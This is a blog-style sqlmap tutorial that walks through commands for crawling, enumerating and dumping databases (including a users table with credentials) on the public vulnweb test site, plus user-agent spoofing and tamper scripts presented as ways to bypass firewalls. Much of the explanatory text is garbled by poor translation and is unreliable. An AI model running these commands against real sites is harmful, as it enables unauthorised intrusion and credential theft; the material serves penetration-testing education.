Bug ExploitPenetration TestingPentesting ToolsWeb Penetration Testing

How to Use Sqlmap – Sqlmap Tutorials | SQL Injection

How to use SQLMAP to test a website for SQL Injection vulnerability (Sqlmap Tutorials)

In this article, we will look at different types of Sqlmap tutorials & Commands that can be useful while using different SQL injection scenarios. Sqlmap Tutorial

The SQLMap tool can be found in each checkbox toolbar. It is one of the most well-known and powerful tools when it comes to exploiting SQL injection vulnerabilities, which itself tops the OWASP top 10 risk list. From verifying SQL injection exposure to extracting pages, tables, and columns and accessing the complete system, it can be used for many purposes For Sqlmap Tutorials 

What is SQL Injection?

SQL Injection is a code injection method where the attacker uses malicious SQL queries that control the web application site. With the right set of queries, the user can access the information stored on the site. SQLMAP assesses whether the ‘GET’ parameter is at risk of SQL injection.

The goal of sqlmap is to detect and apply the risk of SQL injection. Sqlmap is a web-based scanning tool for risk.

When it receives one or more SQL injections into a target host, the user can choose between a variety of options to create a wider fingerprint management system, get DBMS session user and website, and count users, passwords, rights, and information details. , discard all complete DBMS tables/columns or users, use their SQL statement, read some files in the file system, and much more …

SQLMap is written in Python language and this is one of the best tools for making SQL injection attacks.

Also Read: How to Install & Use ApkTool In Termux | Termux ApkTool

SQL injection attack :

SQL is a structured query language. The language used by programs to access data on the associated site. The language also includes instructions for updating or deleting data stored in web page tables.

For end users, access to the web page is a form that will be on the web page or at the beginning of a piece of business software. An example is the field in which you submit a query on a Google page. The backend of the screen captures user input entered on the platform and wraps it into a SQL query.

Hackers have found ways to insert an entire SQL statement or statement clause into the input area. This can mislead the query processing methods embedded in the form and redirect all SQL statements to the web instead of sending the input as a query.

Also Read: How to Create Unlimited Gmail Accounts Without Phone Verification

SQL injection attacks can allow criminals to steal all their records or modify values. The ability to change data on a website allows hackers to steal money. Imagine that a customer could change their account balance from a negative amount to a positive amount. In automated systems, this can lead to payment and criminals can collect the money before anyone in the business knows about the mistake.

 

Overview :

– Techniques-u
– Crawl–forms
– Enumeration–data
– Batch–headers
– Risk–user-agent
– Level–cookie
– Threads–flush-session
– Verbosity–output-dir
– Proxy–tamper
– SQL Injection Via Burp-Suite

 

Installation Sqlmap 

Install Sqlmap in Linux :

sudo apt-get install sqlmap -y

 

Install Sqlmap in Termux:

apt update -y 
apt install git -y 
apt install python2 -y
git clone https://github.com/sqlmapproject/sqlmap.git 
cd sqlmap 
python2 sqlmap.py

 

Video :

 

Hindi Videos: https://play.onlinehacking.xyz/v/VP5Yi3
English Videos: https://play.onlinehacking.xyz/v/fVX9sU

1. Crawl 

A crawl is an important option that allows the SQLMap tool to crawl a website, from a root location. The depth of crawling can be defined in the command.

If you want to clear all references enter the number of lists you want to scan.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2

-u: Target

  • crawl 1: http://www.example.com/news
  • crawl 2: http://www.example.com/news/newest/
  • crawl 3: http://www.example.com/news/newest/terror/
  • crawl 4: http://www.example.com/news/newest/terror/country/

 

2. Batch

The batch command is used to skip the request you receive in sqlmap. Eg: When browsing the target, you should be prompted for y or n (or) to enter any values. However, if you issue a batch command, these values ​​will be skipped and sqlmap will enter the default values.

The batch command is used at random times. When we try to scan something, SQLMap can ask us to provide an input scanner: for example, when the clarity feature is used, the tool asks the user if the user wants to scan the specified URL. When a batch is specified in the command, the tool uses the default value to continue without prompting the user.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch

–batch is all questions will be answered automatically

 

3. Techniques

In sqlmap, I want to use a time-based blind SQL process. –technique = comes with BEUSTQ default which character should only use blind time?

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --technique="U" --batch
  • B: Boolean-based blind
  • E: Error-based
  • U: Union query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries

 

4. Threads 

The batch option allows the user to specify the number of applications submitted simultaneously to SQLMap. This will reduce the entire test time. This value should not be kept high as it may affect the accuracy of the result.

Filters in sqlmap allow the scan to increase the scan rate or decrease the scan rate. So there are levels 1 to 10 threads.

If the number is too fast, the result will be too low, the number will be a bird, and it will send fewer requests and collect more detailed information compared to the highest series.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --threads 5

by default 1 and a maximum of 10

 

 

5. Risk

The danger command in the tool allows users to see the upload. Paid loads range from 1 to 3. By default, sqlmap sets up pay-per-view tools.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --risk 1

 

6. Level 

By default, sqlmap will check all GET and POST parameters specified, but in some cases, you may want to check additional entry points such as HTTP headers. It is possible to specify it with some options, but the only way forward is to use the option – level. There are 5 levels available in sqlmap (default level 1). Level 2 adds an HTTP Cookie title check, and level 3 adds HTTP User-Agent / Referer titles.

The level enables the type of payload used by the tool. It defaults to 1 and can be configured to level 3. Level 3, being very high, includes heavy SQL queries. The standard specifies the amount of the check/payment to be made. The price ranges from 1 to 5. 5, which is the limit, includes a large number of scan uploads.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --level 2

7. Verbosity

In case we want to see the payload sent to the tool, we can use the verbose option. values range from 1 to 6.

Check that payloads are sent in a person-readable format for this purpose using verbose.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch -v 4

Verbosity :

  • 0: Show only Python tracebacks, errors, and critical messages.
  • 1: Show also information and warning messages.
  • 2: Show also debug messages.
  • 3: Show also payloads injected.
  • 4: Show also HTTP requests.
  • 5: Show also HTTP responses’ headers.
  • 6: Show also HTTP responses’ page content.

 

8. Database Enumeration

Given that SQLMap is widely used in SQL injection applications, let’s take a look at some of the site calculator instructions for the vulnerable SQL injection application.

For database enumeration, you need to enter this command -dbs or you can enter the command below to access the website.

 

1, Fine Current User & Current Database and Current hostname (system name)

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-user --current-db --hostname --batch
  • –current-user : Fine fetching current user ( To identify the current database user )
  • –current-db  : Fine fetching current Database ( To identify the current database name )
  • –hostname  : Fine fetching current Hostname ( To identify the current database hostname [system] )

2. Fine available all databases details & names

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
  • –dbs : fetching database names

 

3. Now we have the database name. To find all tables for database “accurate,” run the following command:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
  • -u : Target and also enter the id
  • -D : select database
  • –tables : shows all other tables

Now you can see the database tables

4. To open & save database information from the “users” table, use the following command:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –dump
  • -u : Target and also enter the id
  • -D : select database
  • -T : select database tables
  • –dump : Save & Open Database tables

Cracked the login and password credentials

 

9. HTTP Headers

I was wondering if sqlmap can detect HTTP headers with SQL risk. I know that if I use -level>=3 it will automatically check the HTTP titles of User Agent and Referrer, but I would also like to check some others.

So UserAgent, Cookies and Referrer. You can set custom header fields using the headers = HEADERS option, but in my test, it didn’t check the given input field, but instead sent the given value.

I recently wrote a tool to test all HTTP subject fields, but the number of tests it previously performed pales in comparison to SQLmap. It currently tests SQLi based on errors but also throws some empty bytes into the main fields. However, it will check all default fields including all custom fields.

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --headers="Referer:abc.com" -v 4 --batch

It appears custom header injection is supported :

  • –user-agent=”sqlmap*”
  • –referer=”target.com*”
  • –headers=”User-Agent:test*\nReferer:bla”
  • –headers=”Foo:bar*”
  • -r request.txt

 

 

10. User-Agent

Similarly, many pages are protected by a User-Agent or Referrer title. The same can be added to the command:

Firewall Detect & block your system. user-agent change and Bypass firewall

add any fake user agent and Bypass the firewall

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --user-agent="GECKO_Chrome" -v 4 --batch

Mobile User-Agent :

add the mobile parameter, user agent. request receive mobile user agent

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --mobile -v 4

which smartphone do you want sqlmap to imitate through the HTTP User-Agent header?

  1. Apple iPhone 8 (default)
  2. BlackBerry Z10
  3. Google Nexus 7
  4. Google Pixel
  5. HP iPAQ 6365
  6. HTC 10
  7. Huawei P8
  8. Microsoft Lumia 950
  9. Nokia N97
  10. Samsung Galaxy S7
  11.  Xiaomi Mi 3

user-agent successfully changed and Bypassed the firewall Undetect system

 

11. tamper ( Bypassing WAF

Most of the time, we encounter a situation where the application is stored behind the web application firewall (WAF). Check that the site is protected by WAF

sqlmap --list-tampers

 

bypass SQL injection keyword ( encode keyword & and send. not detect Firewall )

Payload received for encode --tamper=base64encode

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --tamper=base64encode -v 3

 

 

12. Forms 

The URL of the page with the form field (meaning the login page) can be provided with the –form option to parse the page and direct the user to check the specified fields.

login page SQL injection fine – login page Vulnerable parameter check

sqlmap -u http://testphp.vulnweb.com/login.php --forms

Now pages with a large number of form fields can be successfully scanned using the form and group option together. This will analyze the page and check the form fields and automatically provide user input.

If the entire application should be scanned, the clarity option and form and switch can be used.

 

13. Post request

You can also save the request on file. So, if you do not know how to block any application you should learn about the burp suite tool.

Once you have saved the request to file you can submit this post request command.

This Form Vulnerable Check 12. Forms 

sqlmap -u http://192.168.149.137/admin/userinfo.php --data="uname=abc&pass=123&login=submit" –dbs

 

 

14. Proxy

We may specify representative details where we allow the request to proceed. If we want to transfer the request with a proxy tool like Burp, start Burp Suite and configure it to run on localhost in port 8080. Now use the following SQLMap command:

To perform a proxy scan on sqlmap properly, make sure the proxy IP address is set. In particular, the proxy IP will be http://127.0.0.1:8080

SQL map sent the request burp suite and modify your request and send the request server

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 -–proxy="http://127.0.0.1:8080" --batch

Open the burp suite and check your request

 

 

Conclusion :

I hope all the examples in sqlmap also helped you according to this awesome SQL injection tool. Check the video format of the post. Sqlmap is a great tool when it comes to finding and applying SQL injection risks for Sqlmap tutorials. With so many supported options, switches, and the ability to create and use custom text, it excels among many open-source tools that test for SQL injection vulnerabilities.

Suman

Hello, I'm SUMAN from India. I’m currently working on Cyber Ethical Hacking Penetration Testing & Bug Bounty. I’m currently learning more about Web Design, Android ROM

Related Articles

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Back to top button
0
Would love your thoughts, please comment.x
()
x